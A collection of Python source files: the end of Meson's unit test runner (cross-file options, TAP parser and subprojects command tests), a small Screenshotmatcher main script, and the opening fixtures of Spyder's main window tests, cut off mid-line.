cross file, since the implementation # shares code after loading from the files testcase = os.path.join(self.common_test_dir, '41 options') config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}}) with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testcase, extra_args=['--cross-file', config]) self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option') def test_builtin_options(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}}) self.init(testcase, extra_args=['--cross-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'cpp_std': self.assertEqual(each['value'], 'c++14') break else: self.fail('No c++ standard set?') def test_builtin_options_per_machine(self): """Test options that are allowed to be set on a per-machine basis. Such options could be passed twice, once for the build machine, and once for the host machine. I've picked pkg-config path, but any would do that can be set for both. """ testcase = os.path.join(self.common_test_dir, '2 cpp') cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}}) native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}}) # Ensure that PKG_CONFIG_PATH is not set in the environment with mock.patch.dict('os.environ'): for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']: try: del os.environ[k] except KeyError: pass self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native]) configuration = self.introspect('--buildoptions') found = 0 for each in configuration: if each['name'] == 'pkg_config_path': self.assertEqual(each['value'], ['/cross/path']) found += 1 elif each['name'] == 'cpp_std': self.assertEqual(each['value'], 'c++17') found += 1 elif each['name'] == 'build.pkg_config_path': self.assertEqual(each['value'], ['/native/path']) found += 1 elif each['name'] == 'build.cpp_std': self.assertEqual(each['value'], 'c++14') found += 1 if found == 4: break self.assertEqual(found, 4, 'Did not find all sections.') def test_builtin_options_conf_overrides_env(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native'}}) cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross'}}) self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross], override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'}) configuration = self.introspect('--buildoptions') found = 0 for each in configuration: if each['name'] == 'pkg_config_path': self.assertEqual(each['value'], ['/cross']) found += 1 elif each['name'] == 'build.pkg_config_path': self.assertEqual(each['value'], ['/native']) found += 1 if found == 2: break self.assertEqual(found, 2, 'Did not find all sections.') class TAPParserTests(unittest.TestCase): def assert_test(self, events, **kwargs): if 'explanation' not in kwargs: kwargs['explanation'] = None self.assertEqual(next(events), TAPParser.Test(**kwargs)) def assert_plan(self, events, **kwargs): if 'skipped' not in kwargs: kwargs['skipped'] = False if 'explanation' not in kwargs: kwargs['explanation'] = None self.assertEqual(next(events), TAPParser.Plan(**kwargs)) def assert_version(self, events, **kwargs): self.assertEqual(next(events), TAPParser.Version(**kwargs)) def assert_error(self, events): self.assertEqual(type(next(events)), TAPParser.Error) def assert_bailout(self, events, **kwargs): self.assertEqual(next(events), TAPParser.Bailout(**kwargs)) def assert_last(self, events): with self.assertRaises(StopIteration): next(events) def parse_tap(self, s): parser = TAPParser() return iter(parser.parse(io.StringIO(s))) def parse_tap_v13(self, s): events = self.parse_tap('TAP version 13\n' + s) self.assert_version(events, version=13) return events def test_empty(self): events = self.parse_tap('') self.assert_last(events) def test_empty_plan(self): events = self.parse_tap('1..0') self.assert_plan(events, num_tests=0, late=False, skipped=True) self.assert_last(events) def test_plan_directive(self): events = self.parse_tap('1..0 # skipped for some reason') self.assert_plan(events, num_tests=0, late=False, skipped=True, explanation='for some reason') self.assert_last(events) events = self.parse_tap('1..1 # skipped for some reason\nok 1') self.assert_error(events) self.assert_plan(events, num_tests=1, late=False, skipped=True, explanation='for some reason') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) events = self.parse_tap('1..1 # todo not supported here\nok 1') self.assert_error(events) self.assert_plan(events, num_tests=1, late=False, skipped=False, explanation='not supported here') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_one_test_ok(self): events = self.parse_tap('ok') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_one_test_with_number(self): events = self.parse_tap('ok 1') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_one_test_with_name(self): events = self.parse_tap('ok 1 abc') self.assert_test(events, number=1, name='abc', result=TestResult.OK) self.assert_last(events) def test_one_test_not_ok(self): events = self.parse_tap('not ok') self.assert_test(events, number=1, name='', result=TestResult.FAIL) self.assert_last(events) def test_one_test_todo(self): events = self.parse_tap('not ok 1 abc # TODO') self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL) self.assert_last(events) events = self.parse_tap('ok 1 abc # TODO') self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS) self.assert_last(events) def test_one_test_skip(self): events = self.parse_tap('ok 1 abc # SKIP') self.assert_test(events, number=1, name='abc', result=TestResult.SKIP) self.assert_last(events) def test_one_test_skip_failure(self): events = self.parse_tap('not ok 1 abc # SKIP') self.assert_test(events, number=1, name='abc', result=TestResult.FAIL) self.assert_last(events) def test_many_early_plan(self): events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4') self.assert_plan(events, num_tests=4, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_test(events, number=3, name='', result=TestResult.OK) self.assert_test(events, number=4, name='', result=TestResult.FAIL) self.assert_last(events) def test_many_late_plan(self): events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_test(events, number=3, name='', result=TestResult.OK) self.assert_test(events, number=4, name='', result=TestResult.FAIL) self.assert_plan(events, num_tests=4, late=True) self.assert_last(events) def test_directive_case(self): events = self.parse_tap('ok 1 abc # skip') self.assert_test(events, number=1, name='abc', result=TestResult.SKIP) self.assert_last(events) events = self.parse_tap('ok 1 abc # ToDo') self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS) self.assert_last(events) def test_directive_explanation(self): events = self.parse_tap('ok 1 abc # skip why') self.assert_test(events, number=1, name='abc', result=TestResult.SKIP, explanation='why') self.assert_last(events) events = self.parse_tap('ok 1 abc # ToDo Because') self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS, explanation='Because') self.assert_last(events) def test_one_test_early_plan(self): events = self.parse_tap('1..1\nok') self.assert_plan(events, num_tests=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_one_test_late_plan(self): events = self.parse_tap('ok\n1..1') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_plan(events, num_tests=1, late=True) self.assert_last(events) def test_out_of_order(self): events = self.parse_tap('ok 2') self.assert_error(events) self.assert_test(events, number=2, name='', result=TestResult.OK) self.assert_last(events) def test_middle_plan(self): events = self.parse_tap('ok 1\n1..2\nok 2') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_plan(events, num_tests=2, late=True) self.assert_error(events) self.assert_test(events, number=2, name='', result=TestResult.OK) self.assert_last(events) def test_too_many_plans(self): events = self.parse_tap('1..1\n1..2\nok 1') self.assert_plan(events, num_tests=1, late=False) self.assert_error(events) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_too_many(self): events = self.parse_tap('ok 1\nnot ok 2\n1..1') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_plan(events, num_tests=1, late=True) self.assert_error(events) self.assert_last(events) events = self.parse_tap('1..1\nok 1\nnot ok 2') self.assert_plan(events, num_tests=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_error(events) self.assert_last(events) def test_too_few(self): events = self.parse_tap('ok 1\nnot ok 2\n1..3') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_plan(events, num_tests=3, late=True) self.assert_error(events) self.assert_last(events) events = self.parse_tap('1..3\nok 1\nnot ok 2') self.assert_plan(events, num_tests=3, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_error(events) self.assert_last(events) def test_too_few_bailout(self): events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test') self.assert_plan(events, num_tests=3, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_bailout(events, message='no third test') self.assert_last(events) def test_diagnostics(self): events = self.parse_tap('1..1\n# ignored\nok 1') self.assert_plan(events, num_tests=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too') self.assert_plan(events, num_tests=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_plan(events, num_tests=1, late=True) self.assert_last(events) def test_empty_line(self): events = self.parse_tap('1..1\n\nok 1') self.assert_plan(events, num_tests=1, late=False) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_unexpected(self): events = self.parse_tap('1..1\ninvalid\nok 1') self.assert_plan(events, num_tests=1, late=False) self.assert_error(events) self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_last(events) def test_version(self): events = self.parse_tap('TAP version 13\n') self.assert_version(events, version=13) self.assert_last(events) events = self.parse_tap('TAP version 12\n') self.assert_error(events) self.assert_last(events) events = self.parse_tap('1..0\nTAP version 13\n') self.assert_plan(events, num_tests=0, late=False, skipped=True) self.assert_error(events) self.assert_last(events) def test_yaml(self): events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_test(events, number=2, name='', result=TestResult.OK) self.assert_last(events) events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_error(events) self.assert_last(events) events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2') self.assert_test(events, number=1, name='', result=TestResult.OK) self.assert_error(events) self.assert_test(events, number=2, name='', result=TestResult.FAIL) self.assert_last(events) class SubprojectsCommandTests(BasePlatformTests): def setUp(self): super().setUp() self.root_dir = Path(self.builddir) self.project_dir = self.root_dir / 'src' self._create_project(self.project_dir) self.subprojects_dir = self.project_dir / 'subprojects' os.makedirs(str(self.subprojects_dir)) def _create_project(self, path, project_name='dummy'): os.makedirs(str(path), exist_ok=True) with open(str(path / 'meson.build'), 'w') as f: f.write("project('{}')".format(project_name)) def _git(self, cmd, workdir): return git(cmd, str(workdir), check=True)[1].strip() def _git_config(self, workdir): self._git(['config', 'user.name', 'Meson Test'], workdir) self._git(['config', 'user.email', 'meson.test@example.com'], workdir) def _git_remote(self, cmd, name): return self._git(cmd, self.root_dir / name) def _git_local(self, cmd, name): return self._git(cmd, self.subprojects_dir / name) def _git_local_branch(self, name): # Same as `git branch --show-current` but compatible with older git version branch = self._git_local(['rev-parse', '--abbrev-ref', 'HEAD'], name) return branch if branch != 'HEAD' else '' def _git_local_commit(self, name, ref='HEAD'): return self._git_local(['rev-parse', ref], name) def _git_remote_commit(self, name, ref='HEAD'): return self._git_remote(['rev-parse', ref], name) def _git_create_repo(self, path): # If a user has git configuration init.defaultBranch set we want to override that with tempfile.TemporaryDirectory() as d: out = git(['--version'], str(d))[1] if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'): extra_cmd = ['--initial-branch', 'master'] else: extra_cmd = [] self._create_project(path) self._git(['init'] + extra_cmd, path) self._git_config(path) self._git(['add', '.'], path) self._git(['commit', '-m', 'Initial commit'], path) def _git_create_remote_repo(self, name): self._git_create_repo(self.root_dir / name) def _git_create_local_repo(self, name): self._git_create_repo(self.subprojects_dir / name) def _git_create_remote_commit(self, name, branch): self._git_remote(['checkout', branch], name) self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name) def _git_create_remote_branch(self, name, branch): self._git_remote(['checkout', '-b', branch], name) self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name) def _git_create_remote_tag(self, name, tag): self._git_remote(['commit', '--allow-empty', '-m', 'tag {} commit'.format(tag)], name) self._git_remote(['tag', tag], name) def _wrap_create_git(self, name, revision='master'): path = self.root_dir / name with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f: f.write(textwrap.dedent( ''' [wrap-git] url={} revision={} '''.format(os.path.abspath(str(path)), revision))) def _wrap_create_file(self, name, tarball='dummy.tar.gz'): path = self.root_dir / tarball with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f: f.write(textwrap.dedent( ''' [wrap-file] source_url={} '''.format(os.path.abspath(str(path))))) def _subprojects_cmd(self, args): return self._run(self.meson_command + ['subprojects'] + args, workdir=str(self.project_dir)) def test_git_update(self): subp_name = 'sub1' # Create a fake remote git repository and a wrap file. Checks that # "meson subprojects download" works. self._git_create_remote_repo(subp_name) self._wrap_create_git(subp_name) self._subprojects_cmd(['download']) self.assertPathExists(str(self.subprojects_dir / subp_name)) self._git_config(self.subprojects_dir / subp_name) # Create a new remote branch and update the wrap file. Checks that # "meson subprojects update --reset" checkout the new branch. self._git_create_remote_branch(subp_name, 'newbranch') self._wrap_create_git(subp_name, 'newbranch') self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), 'newbranch') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch')) # Update remote newbranch. Checks the new commit is pulled into existing # local newbranch. Make sure it does not print spurious 'git stash' message. self._git_create_remote_commit(subp_name, 'newbranch') out = self._subprojects_cmd(['update', '--reset']) self.assertNotIn('No local changes to save', out) self.assertEqual(self._git_local_branch(subp_name), 'newbranch') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch')) # Update remote newbranch and switch to another branch. Checks that it # switch current branch to newbranch and pull latest commit. self._git_local(['checkout', 'master'], subp_name) self._git_create_remote_commit(subp_name, 'newbranch') self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), 'newbranch') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch')) # Stage some local changes then update. Checks that local changes got # stashed. self._create_project(self.subprojects_dir / subp_name, 'new_project_name') self._git_local(['add', '.'], subp_name) self._git_create_remote_commit(subp_name, 'newbranch') self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), 'newbranch') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch')) self.assertTrue(self._git_local(['stash', 'list'], subp_name)) # Create a new remote tag and update the wrap file. Checks that # "meson subprojects update --reset" checkout the new tag in detached mode. self._git_create_remote_tag(subp_name, 'newtag') self._wrap_create_git(subp_name, 'newtag') self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), '') self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newtag')) # Create a new remote commit and update the wrap file with the commit id. # Checks that "meson subprojects update --reset" checkout the new commit # in detached mode. self._git_local(['checkout', 'master'], subp_name) self._git_create_remote_commit(subp_name, 'newbranch') new_commit = self._git_remote(['rev-parse', 'HEAD'], subp_name) self._wrap_create_git(subp_name, new_commit) self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_branch(subp_name), '') self.assertEqual(self._git_local_commit(subp_name), new_commit) # Create a local project not in a git repository, then update it with # a git wrap. Without --reset it should print error message and return # failure. With --reset it should delete existing project and clone the # new project. subp_name = 'sub2' self._create_project(self.subprojects_dir / subp_name) self._git_create_remote_repo(subp_name) self._wrap_create_git(subp_name) with self.assertRaises(subprocess.CalledProcessError) as cm: self._subprojects_cmd(['update']) self.assertIn('Not a git repository', cm.exception.output) self._subprojects_cmd(['update', '--reset']) self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name)) @skipIfNoExecutable('true') def test_foreach(self): self._create_project(self.subprojects_dir / 'sub_file') self._wrap_create_file('sub_file') self._git_create_local_repo('sub_git') self._wrap_create_git('sub_git') self._git_create_local_repo('sub_git_no_wrap') def ran_in(s): ret = [] prefix = 'Executing command in ' for l in s.splitlines(): if l.startswith(prefix): ret.append(l[len(prefix):]) return sorted(ret) dummy_cmd = ['true'] out = self._subprojects_cmd(['foreach'] + dummy_cmd) self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git', 'subprojects/sub_git_no_wrap'])) out = self._subprojects_cmd(['foreach', '--types', 'git,file'] + dummy_cmd) self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git'])) out = self._subprojects_cmd(['foreach', '--types', 'file'] + dummy_cmd) self.assertEqual(ran_in(out), ['subprojects/sub_file']) out = self._subprojects_cmd(['foreach', '--types', 'git'] + dummy_cmd) self.assertEqual(ran_in(out), ['subprojects/sub_git']) def _clang_at_least(compiler: 'Compiler', minver: str, apple_minver: T.Optional[str]) -> bool: """ check that Clang compiler is at least a specified version, whether AppleClang or regular Clang Parameters ---------- compiler: Meson compiler object minver: str Clang minimum version apple_minver: str AppleCLang minimum version Returns ------- at_least: bool Clang is at least the specified version """ if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler, mesonbuild.compilers.AppleClangCPPCompiler)): if apple_minver is None: return False return version_compare(compiler.version, apple_minver) return version_compare(compiler.version, minver) def unset_envs(): # For unit tests we must fully control all command lines # so that there are no unexpected changes coming from the # environment, for example when doing a package build. varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.CFLAGS_MAPPING.values()) for v in varnames: if v in os.environ: del os.environ[v] def convert_args(argv): # If we got passed a list of tests, pass it on pytest_args = ['-v'] if '-v' in argv else [] test_list = [] for arg in argv: if arg.startswith('-'): if arg in ('-f', '--failfast'): arg = '--exitfirst' pytest_args.append(arg) continue # ClassName.test_name => 'ClassName and test_name' if '.' in arg: arg = ' and '.join(arg.split('.')) test_list.append(arg) if test_list: pytest_args += ['-k', ' or '.join(test_list)] return pytest_args def running_single_tests(argv, cases): ''' Check whether we only got arguments for running individual tests, not entire testcases, and not all testcases (no test args). ''' got_test_arg = False for arg in argv: if arg.startswith('-'): continue for case in cases: if not arg.startswith(case): continue if '.' not in arg: # Got a testcase, done return False got_test_arg = True return got_test_arg def main(): unset_envs() cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests', 'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests', 'TAPParserTests', 'SubprojectsCommandTests', 'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests', 'WindowsTests', 'DarwinTests'] try: import pytest # noqa: F401 # Need pytest-xdist for `-n` arg import xdist # noqa: F401 pytest_args = [] # Don't use pytest-xdist when running single unit tests since it wastes # time spawning a lot of processes to distribute tests to in that case. if not running_single_tests(sys.argv, cases): pytest_args += ['-n', 'auto'] pytest_args += ['./run_unittests.py'] pytest_args += convert_args(sys.argv[1:]) return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode except ImportError: print('pytest-xdist not found, using unittest instead') # Fallback to plain unittest. return unittest.main(defaultTest=cases, buffer=True) if __name__ == '__main__': print('Meson build system', mesonbuild.coredata.version, 'Unit Tests') start = time.monotonic() try: raise SystemExit(main()) finally: print('Total time: {:.3f} seconds'.format(time.monotonic() - start))
main.py
#!/usr/bin/python3 import sys import psutil import threading import ctypes import queue import server.server_discovery as discovery from common.config import Config from common.utility import read_user_config, get_current_ip_address from matching.matcher import Matcher from server.server import Server from gui.app import App def main(): # Queue used for cross-thread communication. Only put (key, value) tuples in there. app_queue = queue.PriorityQueue() # Read user settings read_user_config() # Set the current host IP Config.HOST = get_current_ip_address() # Init Server server = Server(queue=app_queue) # Start server in different thread x = threading.Thread(target=server.start, args=(), daemon=True) x.start() # Start server discovery via UDP socket in different thread udp_t = threading.Thread(target=discovery.start, args=(), daemon=True) udp_t.start() # Start the GUI app = App(queue=app_queue) app.main_loop() if __name__ == "__main__": # program already running. abort. # check causes issues with virtual environments. procs = [p for p in psutil.process_iter() if ('python.exe' in p.name() and __file__ in p.cmdline()) or 'Screenshotmatcher.exe' in p.name()] if len(procs) > 1: # EXE ctypes.windll.user32.MessageBoxW(0, "Screenshotmatcher.exe is already running.", "Screenshotmatcher.exe", 0) # otherwise print("Screenshotmatcher.py is already running.") sys.exit(1) main()
test_mainwindow.py
# -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # Copyright © Spyder Project Contributors # # Licensed under the terms of the MIT License # (see spyder/__init__.py for details) # ----------------------------------------------------------------------------- """ Tests for the main window. """ # Standard library imports import os import os.path as osp import re import shutil import sys import tempfile from textwrap import dedent from unittest.mock import Mock import uuid # Third party imports from flaky import flaky import ipykernel from IPython.core import release as ipy_release from jupyter_client.manager import KernelManager from matplotlib.testing.compare import compare_images import nbconvert import numpy as np from numpy.testing import assert_array_equal import pkg_resources from pkg_resources import parse_version import pylint import pytest from qtpy import PYQT_VERSION from qtpy.QtCore import Qt, QTimer from qtpy.QtTest import QTest from qtpy.QtGui import QImage, QTextCursor from qtpy.QtWidgets import (QAction, QApplication, QFileDialog, QLineEdit, QTabBar, QWidget) from qtpy.QtWebEngineWidgets import WEBENGINE # Local imports from spyder import __trouble_url__ from spyder.api.utils import get_class_values from spyder.api.widgets.auxiliary_widgets import SpyderWindowWidget from spyder.api.plugins import Plugins from spyder.app import start from spyder.config.base import ( get_home_dir, get_conf_path, get_module_path, running_in_ci) from spyder.config.manager import CONF from spyder.dependencies import DEPENDENCIES from spyder.plugins.help.widgets import ObjectComboBox from spyder.plugins.help.tests.test_plugin import check_text from spyder.plugins.ipythonconsole.utils.kernelspec import SpyderKernelSpec from spyder.plugins.layout.layouts import DefaultLayouts from spyder.plugins.projects.api import EmptyProject from spyder.py3compat import PY2, qbytearray_to_str, to_text_string from spyder.utils import encoding from spyder.utils.misc import remove_backslashes from spyder.utils.clipboard_helper import CLIPBOARD_HELPER from spyder.widgets.dock import DockTitleBar # ============================================================================= # ---- Constants # ============================================================================= # Location of this file LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__))) # Time to wait until the IPython console is ready to receive input # (in milliseconds) SHELL_TIMEOUT = 40000 if os.name == 'nt' else 20000 # Need longer EVAL_TIMEOUT, because need to cythonize and C compile ".pyx" file # before import and eval it COMPILE_AND_EVAL_TIMEOUT = 30000 # Time to wait for the IPython console to evaluate something (in # milliseconds) EVAL_TIMEOUT = 3000 # ============================================================================= # ---- Utility functions # ============================================================================= def open_file_in_editor(main_window, fname, directory=None): """Open a file using the Editor and its open file dialog""" top_level_widgets = QApplication.topLevelWidgets() for w in top_level_widgets: if isinstance(w, QFileDialog): if directory is not None: w.setDirectory(directory) input_field = w.findChildren(QLineEdit)[0] input_field.setText(fname) QTest.keyClick(w, Qt.Key_Enter) def reset_run_code(qtbot, shell, code_editor, nsb): """Reset state after a run code test""" qtbot.waitUntil(lambda: not shell._executing) with qtbot.waitSignal(shell.executed): shell.execute('%reset -f') qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT) code_editor.setFocus() qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier) def start_new_kernel(startup_timeout=60, kernel_name='python', spykernel=False, **kwargs): """Start a new kernel, and return its Manager and Client""" km = KernelManager(kernel_name=kernel_name) if spykernel: km._kernel_spec = SpyderKernelSpec() km.start_kernel(**kwargs) kc = km.client() kc.start_channels() try: kc.wait_for_ready(timeout=startup_timeout) except RuntimeError: kc.stop_channels() km.shutdown_kernel() raise return km, kc def find_desired_tab_in_window(tab_name, window): all_tabbars = window.findChildren(QTabBar) for current_tabbar in all_tabbars: for tab_index in range(current_tabbar.count()): if current_tabbar.tabText(tab_index) == str(tab_name): return current_tabbar, tab_index return None, None def register_fake_entrypoints(): """ Create entry points distribution to register elements: * Completion providers (Fallback, Shippets, LSP) """ # Completion providers fallback = pkg_resources.EntryPoint.parse( 'fallback = spyder.plugins.completion.providers.fallback.provider:' 'FallbackProvider' ) snippets = pkg_resources.EntryPoint.parse( 'snippets = spyder.plugins.completion.providers.snippets.provider:' 'SnippetsProvider' ) lsp = pkg_resources.EntryPoint.parse( 'lsp = spyder.plugins.completion.providers.languageserver.provider:' 'LanguageServerProvider' ) # Create a fake Spyder distribution d = pkg_resources.Distribution(__file__) # Add the providers to the fake EntryPoints d._ep_map = { 'spyder.completions': { 'fallback': fallback, 'snippets': snippets, 'lsp': lsp } } # Add the fake distribution to the global working_set pkg_resources.working_set.add(d, 'spyder') def remove_fake_entrypoints(): """Remove fake entry points from pkg_resources""" try: pkg_resources.working_set.by_key.pop('unknown') pkg_resources.working_set.entry_keys.pop('spyder') pkg_resources.working_set.entry_keys.pop(__file__) pkg_resources.working_set.entries.remove('spyder') except KeyError: pass def read_asset_file(filename): """Read contents of an asset file.""" return encoding.read(osp.join(LOCATION, filename))[0] # ============================================================================= # ---- Fixtures # ============================================================================= @pytest.fixture def main_window(request, tmpdir): """Main Window fixture""" if not running_in_ci(): register_fake_entrypoints() # Tests assume inline backend CONF.set('ipython_console', 'pylab/backend', 0) # Test assume the plots are rendered in the console as png CONF.set('plots', 'mute_inline_plotting', False) CONF.set('ipython_console', 'pylab/inline/figure_format', 0) # Set exclamation mark to True CONF.set('ipython_console', 'pdb_use_exclamation_mark', True) # Check if we need to use introspection in a given test # (it's faster and less memory consuming not to use it!) use_introspection = request.node.get_closest_marker('use_introspection') if use_introspection: os.environ['SPY_TEST_USE_INTROSPECTION'] = 'True' else: try: os.environ.pop('SPY_TEST_USE_INTROSPECTION') except KeyError: pass # Only use single_instance mode for tests that require it single_instance = request.node.get_closest_marker('single_instance') if single_instance: CONF.set('main', 'single_instance', True) else: CONF.set('main', 'single_instance', False) # Check if we need to load a simple project to the interface preload_project = request.node.get_closest_marker('preload_project') if preload_project: # Create project directory project = tmpdir.mkdir('test_project') project_path = str(project) # Create Spyder project spy_project = EmptyProject(project_path) CONF.set('project_explorer', 'current_project_path', project_path) # Add a file to the project file = project.join('file.py') file.write(read_asset_file('script_outline_1.py')) spy_project.set_recent_files([str(file)]) else: CONF.set('project_explorer', 'current_project_path', None) # Check if we need to preload a complex project in a give test preload_complex_project = request.node.get_closest_marker( 'preload_complex_project') if preload_complex_project: # Create project project = tmpdir.mkdir('test_project') project_subdir = project.mkdir('subdir') project_sub_subdir = project_subdir.mkdir('sub_subdir') # Create directories out of the project out_of_project_1 = tmpdir.mkdir('out_of_project_1') out_of_project_2 = tmpdir.mkdir('out_of_project_2') out_of_project_1_subdir = out_of_project_1.mkdir('subdir') out_of_project_2_subdir = out_of_project_2.mkdir('subdir') project_path = str(project) spy_project = EmptyProject(project_path) CONF.set('project_explorer', 'current_project_path', project_path) # Add some files to project. This is necessary to test that we get # symbols for all these files. abs_filenames = [] filenames_to_create = { project: ['file1.py', 'file2.py', 'file3.txt', '__init__.py'], project_subdir: ['a.py', '__init__.py'], project_sub_subdir: ['b.py', '__init__.py'], out_of_project_1: ['c.py'], out_of_project_2: ['d.py', '__init__.py'], out_of_project_1_subdir: ['e.py', '__init__.py'], out_of_project_2_subdir: ['f.py'] } for path in filenames_to_create.keys(): filenames = filenames_to_create[path] for filename in filenames: file = path.join(filename) abs_filenames.append(str(file)) if osp.splitext(filename)[1] == '.py': if path == project_subdir: code = read_asset_file('script_outline_2.py') elif path == project_sub_subdir: code = read_asset_file('script_outline_3.py') else: code = read_asset_file('script_outline_1.py') file.write(code) else: file.write("Hello world!") spy_project.set_recent_files(abs_filenames) else: if not preload_project: CONF.set('project_explorer', 'current_project_path', None) # Get config values passed in parametrize and apply them try: param = request.param if isinstance(param, dict) and 'spy_config' in param: CONF.set(*param['spy_config']) except AttributeError: pass if not hasattr(main_window, 'window'): from spyder.api.plugin_registration.registry import PLUGIN_REGISTRY PLUGIN_REGISTRY.reset() # Start the window window = start.main() main_window.window = window else: window = main_window.window # Close everything we can think of window.editor.close_file() window.projects.close_project() if window.console.error_dialog: window.console.close_error_dialog() window.switcher.close() for client in window.ipyconsole.get_clients(): window.ipyconsole.close_client(client=client, ask_recursive=False) window.outlineexplorer.stop_symbol_services('python') # Reset cwd window.explorer.chdir(get_home_dir()) spyder_boilerplate = window.get_plugin( 'spyder_boilerplate', error=False) if spyder_boilerplate is not None: window.unregister_plugin(spyder_boilerplate) # Remove Kite (In case it was registered via setup.py) window.completions.providers.pop('kite', None) yield window # Print shell content if failed if request.node.rep_setup.passed: if request.node.rep_call.failed: # Print content of shellwidget and close window print(window.ipyconsole.get_current_shellwidget( )._control.toPlainText()) # Print info page content is not blank console = window.ipyconsole client = console.get_current_client() if client.info_page != client.blank_page: print('info_page') print(client.info_page) window.close() del main_window.window @pytest.fixture(scope="session", autouse=True) def cleanup(request): """Cleanup a testing directory once we are finished.""" def close_window(): if hasattr(main_window, 'window'): try: main_window.window.close() except AttributeError: pass # Also clean entry points if running locally. if not running_in_ci(): remove_fake_entrypoints() request.addfinalizer(close_window) # ============================================================================= # ---- Tests # ============================================================================= @pytest.mark.slow @pytest.mark.order(1) @pytest.mark.single_instance @pytest.mark.skipif( not running_in_ci(), reason="It's not meant to be run outside of 